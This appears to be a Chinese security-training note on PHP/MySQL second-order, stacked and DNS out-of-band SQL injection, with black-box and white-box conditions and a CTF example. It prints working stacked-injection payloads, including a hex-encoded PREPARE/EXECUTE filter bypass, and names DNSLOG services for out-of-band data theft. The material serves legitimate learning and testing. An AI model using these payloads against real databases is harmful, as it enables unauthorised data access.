-PHP 应用&SQL 二次注入&堆叠执行&DNS 带外&功能点&黑白盒条件

#PHP-MYSQL- 二次注入 -DEMO&74CMS
1 、 DEMO- 用户注册登录修改密码
2 、 CMS-74CMS 个人中心简历功能
黑盒思路:分析功能有添加后对数据操作的地方(功能点)
白盒思路: insert 后进入 select 或 update 的功能的代码块
注入条件:插入时有转义函数或配置,后续有利用插入的数据(遮阳前面失效 而后面修改密码就生效了)

#PHP-MYSQL- 堆叠注入 -DEMO&CTF 强网
堆叠注入触发的条件很苛刻,因为堆叠注入原理就是通过结束符同时执行多条 sql 语
句,
例如 php 中的 mysqli_multi_query 函数。与之相对应的 mysqli_query() 只能执
行一条 SQL ,所以要想目标存在堆叠注入 , 在目标主机存在类似于
mysqli_multi_query() 这样的函数 , 根据数据库类型决定是否支持多条语句执行 .
1 、目标存在 sql 注入漏洞
2 、目标未对 ";" 号进行过滤
3 、目标中间层查询数据库信息时可同时执行多条 sql 语句
支持堆叠数据库: MYSQL MSSQL Postgresql 等
-2019 强网杯 - 随便注( CTF 题型)
';show databases;
';show tables;
';show columns from `1919810931114514`;
';select flag from `1919810931114514`;
';SeT
@a=0x73656c65637420666c61672066726f6d2060313931393831303933313131
3435313460;prepare execsql from @a;execute execsql;
1 、目标存在 sql 注入漏洞
2 、目标未对 ";" 号进行过滤
3 、目标中间层查询数据库信息时可同时执行多条 sql 语句
#PHP-MYSQL- 带外注入 -DEMO&DNSLOG
0. 注入条件
ROOT 高权限且支持 load_file()
有部分注入点是没有回显的,所有读取也是没回显的,采用带外

  1. 使用平台
    http://ceye.io
    http://www.dnslog.cn
相关推荐
yaoxin5211231 小时前
434. Java 日期时间 API - Period 基于日期的时间段
java·开发语言·python
凡人叶枫1 小时前
Effective C++ 条款30:透彻了解 inlining 的里里外外
linux·开发语言·c++·嵌入式开发·effective c++
学逆向的2 小时前
C++纯虚函数
开发语言·c++·网络安全
程序员二叉2 小时前
【JUC】ThreadLocal底层原理|内存泄漏|弱引用|跨线程传递方案
java·开发语言·面试·职场和发展·juc
程序员二叉2 小时前
【JUC】线程池全套深度详解|参数|流程|拒绝策略|调优|异常处理
java·开发语言·jvm·算法·面试·juc
凡人叶枫3 小时前
Effective C++ 条款22:将成员变量声明为 private
linux·开发语言·c++
Qt程序员3 小时前
掌握 Linux 内核调度:从原理到实现(进程篇)
java·开发语言
code bean3 小时前
【LangChain】检索器完全指南:从向量检索到生产级 RAG 架构
java·开发语言·微服务
宋拾壹3 小时前
php对接抖音验券,二维码验券
php·抖音·二维码·验券
LabVIEW开发3 小时前
LabVIEW + MATLAB 混合编程:爆炸场测试数据精准采集方案
开发语言·matlab·labview